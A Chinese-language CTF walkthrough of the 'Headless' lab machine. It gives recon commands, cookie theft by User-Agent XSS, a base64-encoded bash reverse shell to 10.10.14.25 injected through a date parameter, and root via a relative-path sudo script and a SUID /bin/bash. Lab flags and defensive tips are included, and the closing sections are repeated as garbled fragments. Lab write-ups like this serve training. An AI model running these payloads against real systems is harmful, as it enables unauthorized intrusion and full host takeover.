Headless 靶机渗透测试教学文档<\/h1>

靶机概述<\/h2>
Headless 是一个基于 Web 应用程序漏洞的渗透测试靶机，主要涉及 XSS 攻击、RCE（远程代码执行）和权限提升等技术点。靶机 IP 为 10.10.11.8。<\/p>

信息收集阶段<\/h2>

初始扫描<\/h3>

使用 Nmap 进行初始端口扫描：<\/p>

nmap -sC -sV 10.10.11.8 --min-rate 1000<\/span>
<\/span><\/span><\/code><\/pre>目录扫描<\/h3>
发现目标运行在 5000 端口，使用 Gobuster 进行目录扫描：<\/p>
gobuster dir -u "http:\/\/10.10.11.8:5000"<\/span> -w \/usr\/share\/wordlists\/dirbuster\/directory-list-1.0.txt
<\/span><\/span><\/code><\/pre>扫描结果发现 \/dashboard<\/code> 目录。<\/p>
漏洞利用阶段<\/h2>
XSS 攻击<\/h3>

发现目标网站有一个留言板功能<\/li>
尝试在 User-Agent 字段注入 JavaScript 语句<\/li>
构造 XSS payload 用于窃取管理员 cookie：<\/li>
<\/ol>

<\/span><\/span><\/code><\/pre>
使用 Burp Suite 重放请求，等待管理员中招<\/li>
<\/ol>
获取访问权限<\/h3>

使用窃取的 cookie 访问仪表盘：http:\/\/10.10.11.8:5000\/dashboard<\/code><\/li>
发现存在 RCE（远程代码执行）漏洞<\/li>
<\/ol>
远程代码执行<\/h3>

构造反向 shell payload 并进行 base64 编码：<\/li>
<\/ol>
echo "bash -i >& \/dev\/tcp\/10.10.14.25\/10032 0>&1"<\/span> | base64
<\/span><\/span><\/code><\/pre>结果为：YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==<\/code><\/p>

通过 RCE 漏洞执行以下命令（注意 + 号需要进行 URL 编码）：<\/li>
<\/ol>
date=;echo%20YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNC4yNS8xMDAzMiAwPiYxCg==|base64%20-d>\/tmp\/shell.sh;chmod%20777%20\/tmp\/shell.sh;ls%20-al%20\/tmp\/shell.sh;echo%20'cat%20\/tmp\/shell.sh
<\/code><\/pre>

执行 shell 脚本：<\/li>
<\/ol>
date=;\/bin\/bash%20\/tmp\/shell.sh
<\/code><\/pre>

获取用户 flag：<\/li>
<\/ol>
cat \/home\/dvir\/user.txt
<\/span><\/span><\/code><\/pre>结果为：e2576236e9f7ebc8b857de1f2c10fe63<\/code><\/p>
权限提升阶段<\/h2>
检查 sudo 权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>分析 syscheck 程序<\/h3>
strings \/usr\/bin\/syscheck
<\/span><\/span><\/code><\/pre>发现程序会调用 .\/initdb.sh<\/code> 脚本<\/p>
漏洞利用<\/h3>

关键点：.\/initdb.sh<\/code> 使用的是相对路径<\/li>
在 app 目录下创建恶意 initdb.sh：<\/li>
<\/ol>
echo '\/bin\/bash'<\/span>>initdb.sh
<\/span><\/span>chmod +x initdb.sh
<\/span><\/span>sudo \/usr\/bin\/syscheck
<\/span><\/span><\/code><\/pre>成功获取 root 权限<\/p>

获取 root flag：<\/li>
<\/ol>
cat \/root\/root.txt
<\/span><\/span><\/code><\/pre>结果为：927acc092719872f616c53b4a0e910a9<\/code><\/p>
替代提权方法（海外大牛方案）<\/h3>

创建 initdb.sh 给 \/bin\/bash 设置 SUID：<\/li>
<\/ol>
echo "chmod u+s \/bin\/bash"<\/span> > initdb.sh
<\/span><\/span>chmod +x initdb.sh
<\/span><\/span>sudo \/usr\/bin\/syscheck
<\/span><\/span>\/bin\/bash -p
<\/span><\/span><\/code><\/pre>
这样任何用户都可以使用特权模式运行 bash：<\/li>
<\/ol>
\/bin\/bash -c -p "whoami"<\/span>
<\/span><\/span><\/code><\/pre>技术要点总结<\/h2>

XSS 攻击<\/strong>：通过 User-Agent 注入 JavaScript 窃取 cookie<\/li>
RCE 漏洞<\/strong>：通过参数注入实现远程代码执行<\/li>
权限提升<\/strong>：利用相对路径漏洞和 sudo 权限执行恶意脚本<\/li>
SUID 提权<\/strong>：通过给 \/bin\/bash 设置 SUID 实现持久性提权<\/li>
<\/ol>
防御建议<\/h2>

对用户输入进行严格过滤，防止 XSS 攻击<\/li>
避免在 Web 应用中直接执行系统命令<\/li>
使用绝对路径调用脚本<\/li>
遵循最小权限原则，限制 sudo 权限<\/li>
定期检查系统上的 SUID\/SGID 文件<\/li>
<\/ol>

Headless 靶机渗透测试教学文档<\/h1>

靶机概述<\/h2> Headless 是一个基于 Web 应用程序漏洞的渗透测试靶机，主要涉及 XSS 攻击、RCE（远程代码执行）和权限提升等技术点。靶机 IP 为 10.10.11.8。<\/p>

信息收集阶段<\/h2>

防御建议<\/h2> 对用户输入进行严格过滤，防止 XSS 攻击<\/li> 避免在 Web 应用中直接执行系统命令<\/li> 使用绝对路径调用脚本<\/li> 遵循最小权限原则，限制 sudo 权限<\/li> 定期检查系统上的 SUID\/SGID 文件<\/li> <\/ol>

靶机概述<\/h2>
Headless 是一个基于 Web 应用程序漏洞的渗透测试靶机，主要涉及 XSS 攻击、RCE（远程代码执行）和权限提升等技术点。靶机 IP 为 10.10.11.8。<\/p>

防御建议<\/h2>

对用户输入进行严格过滤，防止 XSS 攻击<\/li>
避免在 Web 应用中直接执行系统命令<\/li>
使用绝对路径调用脚本<\/li>
遵循最小权限原则，限制 sudo 权限<\/li>
定期检查系统上的 SUID\/SGID 文件<\/li> <\/ol>